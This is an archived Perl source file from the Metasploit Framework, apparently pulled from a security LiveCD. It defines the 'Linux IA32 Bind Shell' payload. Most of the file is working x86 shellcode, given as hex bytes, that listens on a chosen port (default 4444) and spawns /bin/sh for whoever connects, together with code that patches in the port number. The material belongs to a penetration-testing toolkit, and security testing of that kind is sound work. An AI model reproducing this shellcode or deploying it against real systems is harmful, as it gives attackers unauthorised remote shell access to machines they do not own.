home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / linux_ia32_bind.pm < prev    next >
Text File  |  2006-06-30  |  2KB  |  72 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::linux_ia32_bind;
  11. use strict;
  12. use base 'Msf::PayloadComponent::BindConnection';
  13.  
  14. my $info =
  15. {
  16.     'Name'         => 'Linux IA32 Bind Shell',
  17.     'Version'      => '$Revision: 1.2 $',
  18.     'Description'  => 'Listen for connection and spawn a shell',
  19.     'Authors'      => [ 'skape <miller [at] hick.org>', 
  20.                              'vlad902 <vlad902 [at] gmail.com>' ],
  21.     'Arch'         => [ 'x86' ],
  22.     'Priv'         => 0,
  23.     'OS'           => [ 'linux' ],
  24.     'Size'         => '',
  25. };
  26.  
  27. sub new 
  28. {
  29.     my $class = shift;
  30.     my $hash = @_ ? shift : { };
  31.     $hash = $class->MergeHashRec($hash, {'Info' => $info});
  32.     my $self = $class->SUPER::new($hash, @_);
  33.  
  34.     $self->_Info->{'Size'} = $self->_GenSize;
  35.     return($self);
  36. }
  37.  
  38. sub Build 
  39. {
  40.     my $self = shift;
  41.     return($self->Generate($self->GetVar('LPORT')));
  42. }
  43.  
  44. sub Generate 
  45. {
  46.     my $self = shift;
  47.     my $port = shift;
  48.     my $off_port = 0x14;
  49.     my $port_bin = pack('n', $port);
  50.  
  51.     my $shellcode =
  52.         "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" .
  53.         "\x43\x52\x66\x68\xbf\xbf\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" .
  54.         "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" .
  55.         "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" .
  56.         "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" .
  57.         "\x89\xe1\xcd\x80";
  58.  
  59.     substr($shellcode, $off_port, 2, $port_bin);
  60.  
  61.     return($shellcode);
  62. }
  63.  
  64. sub _GenSize 
  65. {
  66.     my $self = shift;
  67.     my $bin = $self->Generate('4444');
  68.     return(length($bin));
  69. }
  70.  
  71. 1;
  72.